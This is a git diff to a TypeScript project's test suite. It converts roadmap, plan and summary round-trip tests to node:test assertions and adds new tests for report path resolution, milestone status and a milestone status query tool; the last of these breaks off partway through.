-      assertEq(preview.totalSlices, 1, 'complete: preview totalSlices');
-      assertEq(preview.doneSlices, 1, 'complete: preview doneSlices');
-      assertEq(preview.totalTasks, 1, 'complete: preview totalTasks');
-      assertEq(preview.doneTasks, 1, 'complete: preview doneTasks');
-      assertEq(preview.sliceCompletionPct, 100, 'complete: preview sliceCompletionPct');
-      assertEq(preview.taskCompletionPct, 100, 'complete: preview taskCompletionPct');
-      assertEq(preview.requirements.total, 0, 'complete: preview requirements total');
+      assert.deepStrictEqual(preview.milestoneCount, 1, 'complete: preview milestoneCount');
+      assert.deepStrictEqual(preview.totalSlices, 1, 'complete: preview totalSlices');
+      assert.deepStrictEqual(preview.doneSlices, 1, 'complete: preview doneSlices');
+      assert.deepStrictEqual(preview.totalTasks, 1, 'complete: preview totalTasks');
+      assert.deepStrictEqual(preview.doneTasks, 1, 'complete: preview doneTasks');
+      assert.deepStrictEqual(preview.sliceCompletionPct, 100, 'complete: preview sliceCompletionPct');
+      assert.deepStrictEqual(preview.taskCompletionPct, 100, 'complete: preview taskCompletionPct');
+      assert.deepStrictEqual(preview.requirements.total, 0, 'complete: preview requirements total');
 
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
-
-  report();
-}
-
-main().catch((err) => {
-  console.error('Unhandled error:', err);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/migrate-writer.test.ts b/src/resources/extensions/gsd/tests/migrate-writer.test.ts
index 53ce74a52..cc5ea38dd 100644
--- a/src/resources/extensions/gsd/tests/migrate-writer.test.ts
+++ b/src/resources/extensions/gsd/tests/migrate-writer.test.ts
@@ -18,6 +18,8 @@ import {
 import {
   parseRoadmap,
   parsePlan,
+} from '../parsers-legacy.ts';
+import {
   parseSummary,
   parseRequirementCounts,
 } from '../files.ts';
@@ -29,9 +31,9 @@ import type {
   GSDSliceSummaryData,
   GSDTaskSummaryData,
 } from '../migrate/types.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Test Data Builders ────────────────────────────────────────────────────
 
 function makeTask(overrides: Partial<GSDTask> = {}): GSDTask {
@@ -101,11 +103,7 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   };
 }
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario A: Roadmap round-trip with 2 slices (1 done, 1 not)
-// ═══════════════════════════════════════════════════════════════════════════
-
-{
+test('Scenario A: Roadmap round-trip with 2 slices (1 done, 1 not)', () => {
   const milestone = makeMilestone({
     slices: [
       makeSlice({
@@ -130,35 +128,31 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   const output = formatRoadmap(milestone);
   const parsed = parseRoadmap(output);
 
-  assertEq(parsed.title, 'M001: Core Platform', 'roadmap: title');
-  assertEq(parsed.vision, 'Build the core platform', 'roadmap: vision');
-  assertEq(parsed.successCriteria.length, 2, 'roadmap: successCriteria count');
-  assertEq(parsed.successCriteria[0], 'All tests pass', 'roadmap: successCriteria[0]');
-  assertEq(parsed.successCriteria[1], 'Deploy to staging', 'roadmap: successCriteria[1]');
-  assertEq(parsed.slices.length, 2, 'roadmap: slices count');
+  assert.deepStrictEqual(parsed.title, 'M001: Core Platform', 'roadmap: title');
+  assert.deepStrictEqual(parsed.vision, 'Build the core platform', 'roadmap: vision');
+  assert.deepStrictEqual(parsed.successCriteria.length, 2, 'roadmap: successCriteria count');
+  assert.deepStrictEqual(parsed.successCriteria[0], 'All tests pass', 'roadmap: successCriteria[0]');
+  assert.deepStrictEqual(parsed.successCriteria[1], 'Deploy to staging', 'roadmap: successCriteria[1]');
+  assert.deepStrictEqual(parsed.slices.length, 2, 'roadmap: slices count');
 
-  assertEq(parsed.slices[0].id, 'S01', 'roadmap: S01 id');
-  assertEq(parsed.slices[0].title, 'Auth System', 'roadmap: S01 title');
-  assertEq(parsed.slices[0].done, true, 'roadmap: S01 done');
-  assertEq(parsed.slices[0].risk, 'high', 'roadmap: S01 risk');
-  assertEq(parsed.slices[0].depends.length, 0, 'roadmap: S01 depends empty');
-  assertEq(parsed.slices[0].demo, 'Login flow works', 'roadmap: S01 demo');
+  assert.deepStrictEqual(parsed.slices[0].id, 'S01', 'roadmap: S01 id');
+  assert.deepStrictEqual(parsed.slices[0].title, 'Auth System', 'roadmap: S01 title');
+  assert.deepStrictEqual(parsed.slices[0].done, true, 'roadmap: S01 done');
+  assert.deepStrictEqual(parsed.slices[0].risk, 'high', 'roadmap: S01 risk');
+  assert.deepStrictEqual(parsed.slices[0].depends.length, 0, 'roadmap: S01 depends empty');
+  assert.deepStrictEqual(parsed.slices[0].demo, 'Login flow works', 'roadmap: S01 demo');
 
-  assertEq(parsed.slices[1].id, 'S02', 'roadmap: S02 id');
-  assertEq(parsed.slices[1].title, 'Dashboard', 'roadmap: S02 title');
-  assertEq(parsed.slices[1].done, false, 'roadmap: S02 done');
-  assertEq(parsed.slices[1].risk, 'low', 'roadmap: S02 risk');
-  assertEq(parsed.slices[1].depends, ['S01'], 'roadmap: S02 depends');
-  assertEq(parsed.slices[1].demo, 'Dashboard renders data', 'roadmap: S02 demo');
+  assert.deepStrictEqual(parsed.slices[1].id, 'S02', 'roadmap: S02 id');
+  assert.deepStrictEqual(parsed.slices[1].title, 'Dashboard', 'roadmap: S02 title');
+  assert.deepStrictEqual(parsed.slices[1].done, false, 'roadmap: S02 done');
+  assert.deepStrictEqual(parsed.slices[1].risk, 'low', 'roadmap: S02 risk');
+  assert.deepStrictEqual(parsed.slices[1].depends, ['S01'], 'roadmap: S02 depends');
+  assert.deepStrictEqual(parsed.slices[1].demo, 'Dashboard renders data', 'roadmap: S02 demo');
 
-  assertEq(parsed.boundaryMap.length, 0, 'roadmap: boundaryMap empty');
-}
+  assert.deepStrictEqual(parsed.boundaryMap.length, 0, 'roadmap: boundaryMap empty');
+});
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario B: Plan round-trip with 3 tasks (mixed done)
-// ═══════════════════════════════════════════════════════════════════════════
-
-{
+test('Scenario B: Plan round-trip with 3 tasks (mixed done)', () => {
   const slice = makeSlice({
     id: 'S01',
     title: 'Auth System',
@@ -174,31 +168,27 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   const output = formatPlan(slice);
   const parsed = parsePlan(output);
 
-  assertEq(parsed.id, 'S01', 'plan: id');
-  assertEq(parsed.title, 'Auth System', 'plan: title');
-  assertEq(parsed.goal, 'Working authentication system', 'plan: goal');
-  assertEq(parsed.demo, 'Login works with valid credentials', 'plan: demo');
-  assertEq(parsed.tasks.length, 3, 'plan: tasks count');
+  assert.deepStrictEqual(parsed.id, 'S01', 'plan: id');
+  assert.deepStrictEqual(parsed.title, 'Auth System', 'plan: title');
+  assert.deepStrictEqual(parsed.goal, 'Working authentication system', 'plan: goal');
+  assert.deepStrictEqual(parsed.demo, 'Login works with valid credentials', 'plan: demo');
+  assert.deepStrictEqual(parsed.tasks.length, 3, 'plan: tasks count');
 
-  assertEq(parsed.tasks[0].id, 'T01', 'plan: T01 id');
-  assertEq(parsed.tasks[0].title, 'Setup Models', 'plan: T01 title');
-  assertEq(parsed.tasks[0].done, true, 'plan: T01 done');
-  assertEq(parsed.tasks[0].estimate, '15m', 'plan: T01 estimate');
+  assert.deepStrictEqual(parsed.tasks[0].id, 'T01', 'plan: T01 id');
+  assert.deepStrictEqual(parsed.tasks[0].title, 'Setup Models', 'plan: T01 title');
+  assert.deepStrictEqual(parsed.tasks[0].done, true, 'plan: T01 done');
+  assert.deepStrictEqual(parsed.tasks[0].estimate, '15m', 'plan: T01 estimate');
 
-  assertEq(parsed.tasks[1].id, 'T02', 'plan: T02 id');
-  assertEq(parsed.tasks[1].done, false, 'plan: T02 done');
-  assertEq(parsed.tasks[1].estimate, '30m', 'plan: T02 estimate');
+  assert.deepStrictEqual(parsed.tasks[1].id, 'T02', 'plan: T02 id');
+  assert.deepStrictEqual(parsed.tasks[1].done, false, 'plan: T02 done');
+  assert.deepStrictEqual(parsed.tasks[1].estimate, '30m', 'plan: T02 estimate');
 
-  assertEq(parsed.tasks[2].id, 'T03', 'plan: T03 id');
-  assertEq(parsed.tasks[2].done, true, 'plan: T03 done');
-  assertEq(parsed.tasks[2].estimate, '20m', 'plan: T03 estimate');
-}
+  assert.deepStrictEqual(parsed.tasks[2].id, 'T03', 'plan: T03 id');
+  assert.deepStrictEqual(parsed.tasks[2].done, true, 'plan: T03 done');
+  assert.deepStrictEqual(parsed.tasks[2].estimate, '20m', 'plan: T03 estimate');
+});
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario C: Slice summary round-trip with full data
-// ═══════════════════════════════════════════════════════════════════════════
-
-{
+test('Scenario C: Slice summary round-trip with full data', () => {
   const slice = makeSlice({
     id: 'S01',
     title: 'Auth System',
@@ -209,28 +199,24 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   const output = formatSliceSummary(slice, 'M001');
   const parsed = parseSummary(output);
 
-  assertEq(parsed.frontmatter.id, 'S01', 'sliceSummary: id');
-  assertEq(parsed.frontmatter.parent, 'M001', 'sliceSummary: parent');
-  assertEq(parsed.frontmatter.milestone, 'M001', 'sliceSummary: milestone');
-  assertEq(parsed.frontmatter.provides, ['auth-flow', 'jwt-tokens'], 'sliceSummary: provides');
-  assertEq(parsed.frontmatter.requires.length, 0, 'sliceSummary: requires empty');
-  assertEq(parsed.frontmatter.affects.length, 0, 'sliceSummary: affects empty');
-  assertEq(parsed.frontmatter.key_files, ['src/auth.ts', 'src/middleware.ts'], 'sliceSummary: key_files');
-  assertEq(parsed.frontmatter.key_decisions, ['Use JWT over sessions'], 'sliceSummary: key_decisions');
-  assertEq(parsed.frontmatter.patterns_established, ['Middleware pattern'], 'sliceSummary: patterns_established');
-  assertEq(parsed.frontmatter.duration, '2h', 'sliceSummary: duration');
-  assertEq(parsed.frontmatter.completed_at, '2026-03-10', 'sliceSummary: completed_at');
-  assertEq(parsed.frontmatter.verification_result, 'passed', 'sliceSummary: verification_result');
-  assertEq(parsed.frontmatter.blocker_discovered, false, 'sliceSummary: blocker_discovered');
-  assertTrue(parsed.whatHappened.includes('Implemented full auth system'), 'sliceSummary: whatHappened content');
-  assertEq(parsed.title, 'S01: Auth System', 'sliceSummary: title');
-}
+  assert.deepStrictEqual(parsed.frontmatter.id, 'S01', 'sliceSummary: id');
+  assert.deepStrictEqual(parsed.frontmatter.parent, 'M001', 'sliceSummary: parent');
+  assert.deepStrictEqual(parsed.frontmatter.milestone, 'M001', 'sliceSummary: milestone');
+  assert.deepStrictEqual(parsed.frontmatter.provides, ['auth-flow', 'jwt-tokens'], 'sliceSummary: provides');
+  assert.deepStrictEqual(parsed.frontmatter.requires.length, 0, 'sliceSummary: requires empty');
+  assert.deepStrictEqual(parsed.frontmatter.affects.length, 0, 'sliceSummary: affects empty');
+  assert.deepStrictEqual(parsed.frontmatter.key_files, ['src/auth.ts', 'src/middleware.ts'], 'sliceSummary: key_files');
+  assert.deepStrictEqual(parsed.frontmatter.key_decisions, ['Use JWT over sessions'], 'sliceSummary: key_decisions');
+  assert.deepStrictEqual(parsed.frontmatter.patterns_established, ['Middleware pattern'], 'sliceSummary: patterns_established');
+  assert.deepStrictEqual(parsed.frontmatter.duration, '2h', 'sliceSummary: duration');
+  assert.deepStrictEqual(parsed.frontmatter.completed_at, '2026-03-10', 'sliceSummary: completed_at');
+  assert.deepStrictEqual(parsed.frontmatter.verification_result, 'passed', 'sliceSummary: verification_result');
+  assert.deepStrictEqual(parsed.frontmatter.blocker_discovered, false, 'sliceSummary: blocker_discovered');
+  assert.ok(parsed.whatHappened.includes('Implemented full auth system'), 'sliceSummary: whatHappened content');
+  assert.deepStrictEqual(parsed.title, 'S01: Auth System', 'sliceSummary: title');
+});
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario D: Task summary round-trip
-// ═══════════════════════════════════════════════════════════════════════════
-
-{
+test('Scenario D: Task summary round-trip', () => {
   const task = makeTask({
     id: 'T01',
     title: 'Setup Auth',
@@ -241,22 +227,18 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   const output = formatTaskSummary(task, 'S01', 'M001');
   const parsed = parseSummary(output);
 
-  assertEq(parsed.frontmatter.id, 'T01', 'taskSummary: id');
-  assertEq(parsed.frontmatter.parent, 'S01', 'taskSummary: parent');
-  assertEq(parsed.frontmatter.milestone, 'M001', 'taskSummary: milestone');
-  assertEq(parsed.frontmatter.provides, ['auth-endpoint'], 'taskSummary: provides');
-  assertEq(parsed.frontmatter.key_files, ['src/auth.ts'], 'taskSummary: key_files');
-  assertEq(parsed.frontmatter.duration, '45m', 'taskSummary: duration');
-  assertEq(parsed.frontmatter.completed_at, '2026-03-09', 'taskSummary: completed_at');
-  assertTrue(parsed.whatHappened.includes('Built the auth endpoint'), 'taskSummary: whatHappened content');
-  assertEq(parsed.title, 'T01: Setup Auth', 'taskSummary: title');
-}
+  assert.deepStrictEqual(parsed.frontmatter.id, 'T01', 'taskSummary: id');
+  assert.deepStrictEqual(parsed.frontmatter.parent, 'S01', 'taskSummary: parent');
+  assert.deepStrictEqual(parsed.frontmatter.milestone, 'M001', 'taskSummary: milestone');
+  assert.deepStrictEqual(parsed.frontmatter.provides, ['auth-endpoint'], 'taskSummary: provides');
+  assert.deepStrictEqual(parsed.frontmatter.key_files, ['src/auth.ts'], 'taskSummary: key_files');
+  assert.deepStrictEqual(parsed.frontmatter.duration, '45m', 'taskSummary: duration');
+  assert.deepStrictEqual(parsed.frontmatter.completed_at, '2026-03-09', 'taskSummary: completed_at');
+  assert.ok(parsed.whatHappened.includes('Built the auth endpoint'), 'taskSummary: whatHappened content');
+  assert.deepStrictEqual(parsed.title, 'T01: Setup Auth', 'taskSummary: title');
+});
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario E: Requirements round-trip with mixed statuses
-// ═══════════════════════════════════════════════════════════════════════════
-
-{
+test('Scenario E: Requirements round-trip with mixed statuses', () => {
   const requirements: GSDRequirement[] = [
     { id: 'R001', title: 'Auth Required', class: 'core-capability', status: 'active', description: 'Must have auth', source: 'spec', primarySlice: 'S01' },
     { id: 'R002', title: 'Logging', class: 'observability', status: 'active', description: 'Must log', source: 'spec', primarySlice: 'S02' },
@@ -268,110 +250,93 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
   const output = formatRequirements(requirements);
   const counts = parseRequirementCounts(output);
 
-  assertEq(counts.active, 2, 'requirements: active count');
-  assertEq(counts.validated, 1, 'requirements: validated count');
-  assertEq(counts.deferred, 1, 'requirements: deferred count');
-  assertEq(counts.outOfScope, 1, 'requirements: outOfScope count');
-  assertEq(counts.total, 5, 'requirements: total count');
-}
+  assert.deepStrictEqual(counts.active, 2, 'requirements: active count');
+  assert.deepStrictEqual(counts.validated, 1, 'requirements: validated count');
+  assert.deepStrictEqual(counts.deferred, 1, 'requirements: deferred count');
+  assert.deepStrictEqual(counts.outOfScope, 1, 'requirements: outOfScope count');
+  assert.deepStrictEqual(counts.total, 5, 'requirements: total count');
+});
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario F: Edge cases
-// ═══════════════════════════════════════════════════════════════════════════
-
-// F1: Empty vision → fallback text
-{
+test('F1: Empty vision → fallback text', () => {
   const milestone = makeMilestone({ vision: '' });
   const output = formatRoadmap(milestone);
   const parsed = parseRoadmap(output);
-  assertEq(parsed.vision, '(migrated project)', 'edge: empty vision fallback');
-}
+  assert.deepStrictEqual(parsed.vision, '(migrated project)', 'edge: empty vision fallback');
+});
 
-// F2: Empty successCriteria → empty array
-{
+test('F2: Empty successCriteria → empty array', () => {
   const milestone = makeMilestone({ successCriteria: [] });
   const output = formatRoadmap(milestone);
   const parsed = parseRoadmap(output);
-  assertEq(parsed.successCriteria.length, 0, 'edge: empty successCriteria');
-}
+  assert.deepStrictEqual(parsed.successCriteria.length, 0, 'edge: empty successCriteria');
+});
 
-// F3: Empty tasks → empty array in parsed plan
-{
+test('F3: Empty tasks → empty array in parsed plan', () => {
   const slice = makeSlice({ tasks: [] });
   const output = formatPlan(slice);
   const parsed = parsePlan(output);
-  assertEq(parsed.tasks.length, 0, 'edge: empty tasks');
-}
+  assert.deepStrictEqual(parsed.tasks.length, 0, 'edge: empty tasks');
+});
 
-// F4: Null summary → empty string from formatSliceSummary
-{
+test('F4: Null summary → empty string from formatSliceSummary', () => {
   const slice = makeSlice({ summary: null });
   const output = formatSliceSummary(slice, 'M001');
-  assertEq(output, '', 'edge: null summary returns empty string');
-}
+  assert.deepStrictEqual(output, '', 'edge: null summary returns empty string');
+});
 
-// F5: Done=true checkbox in roadmap
-{
+test('F5: Done=true checkbox in roadmap', () => {
   const milestone = makeMilestone({
     slices: [makeSlice({ id: 'S01', done: true })],
   });
   const output = formatRoadmap(milestone);
   const parsed = parseRoadmap(output);
-  assertEq(parsed.slices[0].done, true, 'edge: done checkbox true');
-}
+  assert.deepStrictEqual(parsed.slices[0].done, true, 'edge: done checkbox true');
+});
 
-// F6: Done=false checkbox in roadmap
-{
+test('F6: Done=false checkbox in roadmap', () => {
   const milestone = makeMilestone({
     slices: [makeSlice({ id: 'S01', done: false })],
   });
   const output = formatRoadmap(milestone);
   const parsed = parseRoadmap(output);
-  assertEq(parsed.slices[0].done, false, 'edge: done checkbox false');
-}
+  assert.deepStrictEqual(parsed.slices[0].done, false, 'edge: done checkbox false');
+});
 
-// F7: Null task summary → empty string from formatTaskSummary
-{
+test('F7: Null task summary → empty string from formatTaskSummary', () => {
   const task = makeTask({ summary: null });
   const output = formatTaskSummary(task, 'S01', 'M001');
-  assertEq(output, '', 'edge: null task summary returns empty string');
-}
+  assert.deepStrictEqual(output, '', 'edge: null task summary returns empty string');
+});
 
-// F8: Empty requirements → all zeros
-{
+test('F8: Empty requirements → all zeros', () => {
   const output = formatRequirements([]);
   const counts = parseRequirementCounts(output);
-  assertEq(counts.total, 0, 'edge: empty requirements total 0');
-}
+  assert.deepStrictEqual(counts.total, 0, 'edge: empty requirements total 0');
+});
 
-// F9: formatProject with empty content → produces valid stub
-{
+test('F9: formatProject with empty content → produces valid stub', () => {
   const output = formatProject('');
-  assertTrue(output.includes('# Project'), 'edge: empty project has heading');
-  assertTrue(output.length > 10, 'edge: empty project not blank');
-}
+  assert.ok(output.includes('# Project'), 'edge: empty project has heading');
+  assert.ok(output.length > 10, 'edge: empty project not blank');
+});
 
-// F10: formatProject with existing content → passes through
-{
+test('F10: formatProject with existing content → passes through', () => {
   const content = '# My Project\n\nDescription here.\n';
   const output = formatProject(content);
-  assertEq(output, content, 'edge: project passthrough');
-}
+  assert.deepStrictEqual(output, content, 'edge: project passthrough');
+});
 
-// F11: formatDecisions with empty content → produces valid stub
-{
+test('F11: formatDecisions with empty content → produces valid stub', () => {
   const output = formatDecisions('');
-  assertTrue(output.includes('# Decisions'), 'edge: empty decisions has heading');
-}
+  assert.ok(output.includes('# Decisions'), 'edge: empty decisions has heading');
+});
 
-// F12: formatContext produces valid content
-{
+test('F12: formatContext produces valid content', () => {
   const output = formatContext('M001');
-  assertTrue(output.includes('M001'), 'edge: context mentions milestone');
-}
+  assert.ok(output.includes('M001'), 'edge: context mentions milestone');
+});
 
-// F13: formatState produces valid content
-{
+test('F13: formatState produces valid content', () => {
   const milestones = [makeMilestone({
     slices: [
       makeSlice({ done: true }),
@@ -379,20 +344,18 @@ function makeTaskSummary(overrides: Partial<GSDTaskSummaryData> = {}): GSDTaskSu
     ],
   })];
   const output = formatState(milestones);
-  assertTrue(output.includes('1/2'), 'edge: state shows slice progress');
-}
+  assert.ok(output.includes('1/2'), 'edge: state shows slice progress');
+});
 
-// F14: Task with no estimate → no est backtick in plan
-{
+test('F14: Task with no estimate → no est backtick in plan', () => {
   const slice = makeSlice({
     tasks: [makeTask({ id: 'T01', title: 'Quick Fix', estimate: '' })],
   });
   const output = formatPlan(slice);
   const parsed = parsePlan(output);
-  assertEq(parsed.tasks[0].id, 'T01', 'edge: task no estimate id');
-  assertEq(parsed.tasks[0].estimate, '', 'edge: task no estimate empty');
-}
+  assert.deepStrictEqual(parsed.tasks[0].id, 'T01', 'edge: task no estimate id');
+  assert.deepStrictEqual(parsed.tasks[0].estimate, '', 'edge: task no estimate empty');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 
-report();
diff --git a/src/resources/extensions/gsd/tests/milestone-report-path.test.ts b/src/resources/extensions/gsd/tests/milestone-report-path.test.ts
new file mode 100644
index 000000000..8ab7c1571
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/milestone-report-path.test.ts
@@ -0,0 +1,51 @@
+/**
+ * milestone-report-path.test.ts — Regression test for milestone report path resolution.
+ *
+ * When running in a worktree, milestone reports must be written to the
+ * original project root (originalBasePath), not the worktree path (basePath).
+ *
+ * Covers: _resolveReportBasePath from auto/phases.ts
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+import { _resolveReportBasePath } from "../auto/phases.ts";
+
+describe("_resolveReportBasePath", () => {
+  test("uses originalBasePath when set (worktree scenario)", () => {
+    const session = {
+      originalBasePath: "/projects/my-app",
+      basePath: "/projects/my-app/.claude/worktrees/agent-abc123",
+    };
+
+    assert.equal(_resolveReportBasePath(session), "/projects/my-app");
+  });
+
+  test("falls back to basePath when originalBasePath is empty", () => {
+    const session = {
+      originalBasePath: "",
+      basePath: "/projects/my-app",
+    };
+
+    assert.equal(_resolveReportBasePath(session), "/projects/my-app");
+  });
+
+  test("falls back to basePath when originalBasePath is undefined", () => {
+    const session = {
+      originalBasePath: undefined as unknown as string,
+      basePath: "/projects/my-app",
+    };
+
+    assert.equal(_resolveReportBasePath(session), "/projects/my-app");
+  });
+
+  test("uses originalBasePath even when basePath differs", () => {
+    const session = {
+      originalBasePath: "/home/user/repo",
+      basePath: "/tmp/worktree-xyz",
+    };
+
+    assert.equal(_resolveReportBasePath(session), "/home/user/repo");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/milestone-status-authoritative.test.ts b/src/resources/extensions/gsd/tests/milestone-status-authoritative.test.ts
new file mode 100644
index 000000000..94fdcf3c0
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/milestone-status-authoritative.test.ts
@@ -0,0 +1,116 @@
+/**
+ * Bug #2807: Web roadmap derives milestone status from slice heuristics
+ * instead of authoritative GSD milestone state.
+ *
+ * getMilestoneStatus() should prefer the authoritative `status` field on
+ * WorkspaceMilestoneTarget (populated from the engine registry) rather
+ * than inferring status from slice completion flags.
+ */
+import test from "node:test";
+import assert from "node:assert/strict";
+import { getMilestoneStatus } from "../../../../../web/lib/workspace-status.ts";
+
+// Inline type to avoid importing .tsx (not compiled to .js by test pipeline)
+interface TestMilestone {
+  id: string;
+  title: string;
+  roadmapPath?: string;
+  status?: "complete" | "active" | "pending" | "parked";
+  validationVerdict?: "pass" | "needs-attention" | "needs-remediation";
+  slices: Array<{ id: string; title: string; done: boolean; tasks: Array<{ id: string; title: string; done: boolean }> }>;
+}
+
+// ── Helpers ────────────────────────────────────────────────────────────────
+
+function makeMilestone(overrides: Partial<TestMilestone> & { id: string }): TestMilestone {
+  return {
+    title: overrides.id,
+    roadmapPath: undefined,
+    slices: [],
+    ...overrides,
+  };
+}
+
+// ── Tests ──────────────────────────────────────────────────────────────────
+
+test("getMilestoneStatus returns authoritative 'complete' even when slices are not all done", () => {
+  const milestone = makeMilestone({
+    id: "M001",
+    status: "complete",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+      { id: "S02", title: "Slice 2", done: false, tasks: [] }, // not done
+    ],
+  });
+  // Before the fix, this would return "in-progress" because not all slices are done.
+  // After the fix, it should return "done" because authoritative status is "complete".
+  assert.equal(getMilestoneStatus(milestone, {}), "done");
+});
+
+test("getMilestoneStatus returns authoritative 'active' regardless of slice state", () => {
+  const milestone = makeMilestone({
+    id: "M002",
+    status: "active",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+      { id: "S02", title: "Slice 2", done: true, tasks: [] },
+    ],
+  });
+  // Before the fix, this would return "done" because all slices are done.
+  // After the fix, it should return "in-progress" because authoritative status is "active".
+  assert.equal(getMilestoneStatus(milestone, {}), "in-progress");
+});
+
+test("getMilestoneStatus returns 'pending' for authoritative 'pending' even when some slices done", () => {
+  const milestone = makeMilestone({
+    id: "M003",
+    status: "pending",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+      { id: "S02", title: "Slice 2", done: false, tasks: [] },
+    ],
+  });
+  // Before the fix, this would return "in-progress" because some slices are done.
+  // After the fix, it should return "pending".
+  assert.equal(getMilestoneStatus(milestone, {}), "pending");
+});
+
+test("getMilestoneStatus maps 'parked' to 'pending' item status", () => {
+  const milestone = makeMilestone({
+    id: "M004",
+    status: "parked",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+    ],
+  });
+  // Parked milestones should render as pending in the UI
+  assert.equal(getMilestoneStatus(milestone, {}), "pending");
+});
+
+test("getMilestoneStatus falls back to heuristic when no authoritative status", () => {
+  // Backward compatibility: milestones without the status field should
+  // still work using the old slice-based heuristic.
+  const milestone = makeMilestone({
+    id: "M005",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+      { id: "S02", title: "Slice 2", done: true, tasks: [] },
+    ],
+  });
+  assert.equal(getMilestoneStatus(milestone, {}), "done");
+});
+
+test("getMilestoneStatus exposes validationVerdict on milestone target", () => {
+  const milestone = makeMilestone({
+    id: "M006",
+    status: "complete",
+    validationVerdict: "needs-attention",
+    slices: [
+      { id: "S01", title: "Slice 1", done: true, tasks: [] },
+    ],
+  });
+  // The milestone should have the validationVerdict field available
+  assert.equal(milestone.validationVerdict, "needs-attention");
+  // And status should still be "done"
+  assert.equal(getMilestoneStatus(milestone, {}), "done");
+});
diff --git a/src/resources/extensions/gsd/tests/milestone-status-tool.test.ts b/src/resources/extensions/gsd/tests/milestone-status-tool.test.ts
new file mode 100644
index 000000000..e1dfb3e95
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/milestone-status-tool.test.ts
@@ -0,0 +1,201 @@
+// GSD2 — Tests for gsd_milestone_status read-only query tool
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+
+import { registerQueryTools } from "../bootstrap/query-tools.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  _getAdapter,
+} from "../gsd-db.ts";
+
+// ─── Helpers ──────────────────────────────────────────────────────────────────
+
+function makeMockPi() {
+  const tools: any[] = [];
+  return {
+    registerTool: (tool: any) => tools.push(tool),
+    tools,
+  } as any;
+}
+
+function makeTmpBase(): string {
+  const base = join(tmpdir(), `gsd-query-tool-test-${randomUUID()}`);
+  mkdirSync(join(base, ".gsd"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* swallow */ }
+}
+
+function openTestDb(base: string): void {
+  openDatabase(join(base, ".gsd", "gsd.db"));
+}
+
+async function executeToolInDir(tool: any, params: Record<string, unknown>, dir: string) {
+  const originalCwd = process.cwd();
+  try {
+    process.chdir(dir);
+    return await tool.execute("test-call-id", params, undefined, undefined, undefined);
+  } finally {
+    process.chdir(originalCwd);
+  }
+}
+
+// ─── Seed helpers ─────────────────────────────────────────────────────────────
+
+function seedMilestone(milestoneId: string, title: string, status = "active"): void {
+  const db = _getAdapter();
+  if (!db) throw new Error("DB not open");
+  db.prepare(
+    "INSERT OR REPLACE INTO milestones (id, title, status, created_at) VALUES (?, ?, ?, ?)",
+  ).run(milestoneId, title, status, new Date().toISOString());
+}
+
+function seedSlice(milestoneId: string, sliceId: string, status: string): void {
+  const db = _getAdapter();
+  if (!db) throw new Error("DB not open");
+  db.prepare(
+    "INSERT OR REPLACE INTO slices (milestone_id, id, title, status, created_at) VALUES (?, ?, ?, ?, ?)",
+  ).run(milestoneId, sliceId, `Slice ${sliceId}`, status, new Date().toISOString());
+}
+
+function seedTask(milestoneId: string, sliceId: string, taskId: string, status: string): void {
+  const db = _getAdapter();
+  if (!db) throw new Error("DB not open");
+  db.prepare(
+    "INSERT OR REPLACE INTO tasks (milestone_id, slice_id, id, title, status) VALUES (?, ?, ?, ?, ?)",
+  ).run(milestoneId, sliceId, taskId, `Task ${taskId}`, status);
+}
+
+// ─── Registration ─────────────────────────────────────────────────────────────
+
+test("registerQueryTools registers gsd_milestone_status tool", () => {
+  const pi = makeMockPi();
+  registerQueryTools(pi);
+  assert.equal(pi.tools.length, 1, "Should register exactly one tool");
+  assert.equal(pi.tools[0].name, "gsd_milestone_status");
+});
+
+test("gsd_milestone_status has promptGuidelines mentioning prohibited alternatives", () => {
+  const pi = makeMockPi();
+  registerQueryTools(pi);
+  const tool = pi.tools[0];
+  assert.ok(Array.isArray(tool.promptGuidelines), "promptGuidelines must be an array");
+  assert.ok(tool.promptGuidelines.length >= 1, "Must have at least one guideline");
+  const joined = tool.promptGuidelines.join(" ");
+  assert.match(joined, /sqlite3|better-sqlite3/, "Guidelines must mention prohibited alternatives");
+});
+
+// ─── Happy path: milestone with slices and tasks ──────────────────────────────
+
+test("gsd_milestone_status returns milestone metadata and slice statuses", async () => {
+  const base = makeTmpBase();
+  try {
+    openTestDb(base);
+    seedMilestone("M001", "Test Milestone");
+    seedSlice("M001", "S01", "complete");
+    seedSlice("M001", "S02", "active");
